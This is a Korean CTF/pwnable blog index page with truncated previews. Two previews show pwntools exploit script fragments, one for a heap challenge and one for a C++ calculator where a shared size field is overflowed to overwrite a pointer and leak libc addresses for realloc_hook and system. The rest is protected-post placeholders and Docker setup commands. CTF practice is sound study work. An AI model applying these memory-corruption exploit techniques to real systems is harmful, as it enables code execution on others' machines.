목록Security/Pwnable (146)
cdor1's lab
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
from pwn import * import sys DEBUG = True server = "127.0.0.1" port = 11111 p = None target = "./start_whl" if len(sys.argv) > 1: DEBUG = False pass else: #p = remote('10.10.134.127', 30000) p = process(target, env={'LD_PRELOAD':'./libc.so.6'}) def add(name, age, feature): p.sendline('1') print p.recv() p.send(name) print p.recv() p.sendline(str(age)) print p.recv() p.send(feature) def delete(in..
c++로 짜여진 계산기 문제다.a = "AAA"a = 90으로 공동 사용하는 size값을 속여버리면 overflow가 가능해지고 밑에있는 포인터를 덮어 익스플로잇 가능하다. from pwn import * s = process('./calc') def rv(): print s.recv() rv() s.sendline('a') rv() s.sendline('') rv() s.sendline('') rv() s.sendline('') print s.recv().encode('hex') print s.recvuntil('>>> ') print s.recvuntil('>>> ') leak = u32(s.recv(4)) - 0x20c7b0 realloc_hook= leak + 0x20c764 system = le..
This post described centered on pwnable.tw docker environment 1. Build container Enter this command in the path containing the Dockerfiledocker build -t [name]:[tag]docker build -t critical_heap:1.0 2. Check container docker images 3. Run containerdocker run -it [name]:[tag] [command] docker run -it critical_heap:1.0 /bin/bash
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.